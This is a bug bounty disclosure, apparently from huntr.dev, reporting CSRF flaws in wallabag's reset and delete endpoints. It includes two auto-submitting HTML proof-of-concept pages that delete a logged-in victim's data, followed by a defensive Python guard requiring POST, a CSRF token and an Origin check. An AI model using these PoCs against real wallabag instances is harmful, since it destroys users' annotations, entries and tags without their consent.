History: Mar 08, 2023 - 5:07 a.m.

Several CSRFs in Reset Area and Delete Entry Action

2023-03-08 05:07:50
zpbrent
www.huntr.dev
5
Tags: csrf, reset, delete, wallabag, proof of concept, bug bounty

EPSS: 0.0005 (Low), Percentile: 16.2%

Description

I find wallabag suffering several Cross-Site Request Forgery (CSRF) vulnerabilities which allow attackers to arbitrarily delete the victim user's annotations, entries and tags via a GET request to /reset/annotations, /reset/entries, /reset/tags, /reset/archived, as well as /delete/[Entry ID], in which the [Entry ID] can be estimated easily as it is indexed from 1 and incremented by 1 when a new entry is added. The attacker can simply craft all these dangerous actions in one link and then drive the victim to delete them all in one click.

Proof of Concept

For /reset/annotations
Log in as a user.
Open the following HTML file in the browser.

<!-- PoC.html -->
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <!-- A form with no method attribute submits via GET, so this issues
         GET /reset/annotations with the victim's session cookie attached -->
    <form action="http://example.com/reset/annotations">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

For /reset/entries, /reset/tags and /reset/archived, we can simply modify the above PoC by changing annotations to entries, tags or archived.

For /delete/[Entry ID]
Log in as a user.
Find an entry ID; here the [Entry ID] is 10.
Open the following HTML file in the browser.

<!-- PoC.html -->
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <!-- Same GET-form pattern as above, targeting the guessable entry ID -->
    <form action="http://example.com/delete/10">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

The added entry has been deleted.
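The root cause is that /reset/* and /delete/[Entry ID] change state on a bare GET with nothing tying the request to a page the user actually loaded. The following is an added example, not wallabag's own code, sketching the server-side guard that defeats both PoCs: state changes only over POST, a per-session CSRF token that a cross-site page cannot read, and an Origin check as defence in depth. SITE_ORIGIN, Session, Request and guard are assumed names for the illustration.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

SITE_ORIGIN = "https://wallabag.example"  # assumed deployment origin (placeholder)
STATE_CHANGING_PREFIXES = ("/reset/", "/delete/")


@dataclass
class Session:
    """Constructed stand-in for a server-side session; token is minted at login."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """Constructed stand-in for an incoming HTTP request."""
    method: str
    path: str
    origin: Optional[str] = None           # Origin header, if the browser sent one
    form: Dict[str, str] = field(default_factory=dict)


def guard(req: Request, session: Session) -> Tuple[int, str]:
    """Decide whether a request may perform a state change; returns (status, reason)."""
    if not req.path.startswith(STATE_CHANGING_PREFIXES):
        return 200, "not a state-changing route"
    # 1. A cross-site <form> without method, an <img> or a link can only send GET.
    if req.method != "POST":
        return 405, "state change attempted over %s" % req.method
    # 2. The token lives in the user's own page; another origin cannot read it.
    submitted = req.form.get("_token", "")
    if not hmac.compare_digest(submitted.encode(), session.csrf_token.encode()):
        return 403, "missing or invalid CSRF token"
    # 3. Browsers attach Origin to cross-site POSTs; reject anything foreign.
    if req.origin is not None and req.origin != SITE_ORIGIN:
        return 403, "cross-origin request from %s" % req.origin
    return 200, "ok"


if __name__ == "__main__":
    s = Session(user="victim")
    # The shape of the PoC above: a GET to /delete/10 carrying only the cookie.
    print(guard(Request("GET", "/delete/10"), s))
    print(guard(Request("POST", "/delete/10", SITE_ORIGIN, {"_token": s.csrf_token}), s))
```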
